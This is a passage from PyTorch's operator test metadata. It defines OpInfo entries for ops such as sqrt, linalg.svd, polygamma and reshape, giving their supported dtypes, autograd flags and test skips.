supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Gradcheck fails DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=floating_and_complex_types()), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), UnaryUfuncInfo('trunc', aliases=('fix', ), ref=np.trunc, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('exp2', aliases=('special.exp2', ), ref=np_unary_ufunc_integer_promotion_wrapper(np.exp2), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('expm1', aliases=('special.expm1', ), ref=np_unary_ufunc_integer_promotion_wrapper(np.expm1), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/48926#issuecomment-739734774 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('nan_to_num', ref=np.nan_to_num, dtypes=all_types_and(torch.half, torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bool, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), # Passing numpy_kwargs via sample_kwargs, as numpy does comparison # with BFloat16 in float, since it currently doesn't support BFloat16. # Ref: https://github.com/pytorch/pytorch/issues/57982#issuecomment-839150556 sample_kwargs=lambda device, dtype, input: ({}, {'posinf': torch.finfo(torch.bfloat16).max, 'neginf': torch.finfo(torch.bfloat16).min}) if dtype is torch.bfloat16 else ({}, {})), UnaryUfuncInfo('reciprocal', ref=np_unary_ufunc_integer_promotion_wrapper(np.reciprocal), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/45690 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), # Reference: https://github.com/pytorch/pytorch/pull/49102#issuecomment-744604601 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), )), UnaryUfuncInfo('rsqrt', ref=lambda x: np.reciprocal(np.sqrt(x)), domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.half: 5e-2}),), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.cfloat, torch.cdouble)), )), UnaryUfuncInfo('sqrt', ref=np.sqrt, supports_sparse=True, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_sparse_csr=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 7e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/47358 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), # Reference: https://github.com/pytorch/pytorch/pull/47293#issuecomment-721774436 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('square', ref=np.square, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), decorators=(precisionOverride({torch.complex64: 3e-4, torch.bfloat16: 3e-1}),), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/52549 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble]), # >>> t = torch.tensor(complex(-0.01, float("inf"))) # >>> np.square(t.numpy()) # (-inf-infj) # >>> t.square() # tensor(-inf-infj) # >>> t.cuda().square() # tensor(inf+nanj, device='cuda:0') DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble]), # Reference: https://github.com/pytorch/pytorch/pull/52551#issuecomment-782596181 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), ),), OpInfo('lerp', dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_lerp, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True), OpInfo('linalg.inv', aten_name='linalg_inv', op=torch.linalg.inv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.inv_ex', aten_name='linalg_inv_ex', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), UnaryUfuncInfo('angle', ref=np.angle, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse_csr=True, supports_complex_to_float=True, skips=( # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,),), )), UnaryUfuncInfo('isfinite', ref=np.isfinite, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_autograd=False), UnaryUfuncInfo('isinf', ref=np.isinf, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_sparse=True, supports_sparse_csr=True, supports_autograd=False, skips=( # "nonzero_count_cpu" not implemented for 'ComplexHalf' # "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.chalf,)), # "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.chalf,)), )), UnaryUfuncInfo('isposinf', ref=np.isposinf, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), UnaryUfuncInfo('isneginf', ref=np.isneginf, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), UnaryUfuncInfo('isreal', ref=np.isreal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_autograd=False), UnaryUfuncInfo('isnan', ref=np.isnan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), OpInfo('linalg.solve', aten_name='linalg_solve', op=torch.linalg.solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.solve_triangular', aten_name='linalg_solve_triangular', op=torch.linalg.solve_triangular, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_solve_triangular, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), # linalg.solve_triangular cannot be batched over because of a call to out.copy_(result); supports_forward_ad=True), OpInfo('linalg.matrix_rank', aten_name='linalg_matrix_rank', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), ), OpInfo('linalg.matrix_rank', aten_name='linalg_matrix_rank', variant_test_name='hermitian', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_pinv_hermitian, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), ), OpInfo('linalg.pinv', aten_name='linalg_pinv', op=torch.linalg.pinv, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # errors with "leaked XXXX bytes CUDA memory on device 0" DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),) ), OpInfo('linalg.pinv', aten_name='linalg_pinv', variant_test_name='singular', # pinv is Frechet-differentiable in a rank-preserving neighborhood, # so we feed inputs that are the products of two full-rank factors, # to avoid any rank changes caused by the perturbations in the gradcheck op=lambda a, b: torch.linalg.pinv(a @ b.mT), dtypes=floating_and_complex_types(), supports_out=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv_singular, # Only large tensors show issues with implicit backward used prior to # explicit backward implementation. decorators=[slowTest, skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # CUDA runs out of memory DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad', device_type='cuda', dtypes=[torch.cdouble]), # This test takes almost 2 hours to run! DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad', device_type='cuda', dtypes=[torch.cdouble]), )), OpInfo('linalg.pinv', aten_name='linalg_pinv', variant_test_name='hermitian', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv_hermitian, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ) ), OpInfo('eig', op=torch.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_eig, error_inputs_func=error_inputs_eig, decorators=[ skipCUDAIfNoMagma, skipCPUIfNoLapack, ], ), OpInfo('einsum', # we need this lambda because SampleInput expects tensor input as the first argument # TODO(@heitorschueroff) update SampleInput to handle such cases op=lambda tensors, equation: torch.einsum(equation, tensors), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if ((SM60OrLater and CUDA11OrLater) or TEST_WITH_ROCM) else []), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, # See https://github.com/pytorch/pytorch/issues/66357 sample_inputs_func=sample_inputs_einsum, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # test does not work with passing lambda for op # there's a test `test_einsum` in `test_jit.py` to handle this case # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('svd', op=torch.svd, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_svd, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, # We're using at::allclose, which does not have a batching rule check_batched_grad=False, check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], skips=( # Fixme, forward over backward gives a numerical error DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.svd', op=torch.linalg.svd, aten_name='linalg_svd', dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_forward_grad=False, # We're using at::allclose, which does not have a batching rule check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_svd, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], skips=( # FIXME forward over backward gives a numerical error DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.svdvals', op=torch.linalg.svdvals, aten_name='linalg_svdvals', dtypes=floating_and_complex_types(), check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True, # We're using at::allclose, which does not have a batching rule check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_svdvals, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off]), OpInfo('svd_lowrank', op=lambda *args, **kwargs: wrapper_set_seed( lambda a, b, **kwargs: torch.svd_lowrank(a @ b.mT, **kwargs), *args, **kwargs ), dtypes=floating_types(), supports_out=False, check_batched_grad=False, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True, sample_inputs_func=sample_inputs_svd_lowrank, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off, DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # test does not work with passing lambda for op DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('pca_lowrank', op=lambda *args, **kwargs: wrapper_set_seed( lambda a, b, **kwargs: torch.pca_lowrank(a @ b.mT, **kwargs), *args, **kwargs ), dtypes=floating_types(), supports_out=False, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_pca_lowrank, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off, DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # test does not work with passing lambda for op DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), BinaryUfuncInfo('polar', dtypes=floating_types(), # this function is undefined if 'abs' values are <0 supports_forward_ad=True, lhs_make_tensor_kwargs=dict(low=0), supports_rhs_python_scalar=False, skips=( # RuntimeError: Expected object of scalar type Float but got scalar type Double for second argument DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_type_promotion'), # GradcheckError: Jacobian computed with forward mode mismatch for output 0 with respect to input 0 # Numerical: # tensor([[0.]], dtype=torch.float64) # Analytical: # tensor([[-0.0047]], dtype=torch.float64, grad_fn=<CopySlices>) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), )), # TODO(@kshitij12345): Refactor similar to `mvlgamma` entries. # To test reference numerics against multiple values of argument `n`, # we make multiple OpInfo entries with each entry corresponding to different value of n (currently 0 to 4). # We run the op tests from test_ops.py only for `n=0` to avoid redundancy in testing. UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_0', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), ), sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0})), # A separate OpInfo entry for special.polygamma is needed to reorder the arguments # for the alias. See the discussion here: https://github.com/pytorch/pytorch/pull/59691#discussion_r650261939 UnaryUfuncInfo('special.polygamma', op=lambda x, n, **kwargs: torch.special.polygamma(n, x, **kwargs), variant_test_name='special_polygamma_n_0', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), ), sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_1', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large'), ), sample_kwargs=lambda device, dtype, input: ({'n': 1}, {'n': 1}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_2', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM),), sample_kwargs=lambda device, dtype, input: ({'n': 2}, {'n': 2}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_3', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),), sample_kwargs=lambda device, dtype, input: ({'n': 3}, {'n': 3}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_4', ref=reference_polygamma if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 5e-4, torch.float32: 5e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM),), sample_kwargs=lambda device, dtype, input: ({'n': 4}, {'n': 4}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), OpInfo('ravel', ref=np.ravel, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_ravel, ), OpInfo('reshape', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=True), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=True), error_inputs_func=error_inputs_reshape, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('reshape_as', op=lambda x, other: x.reshape_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_reshape_as, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view', op=lambda x, shape: x.view(shape), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=False), 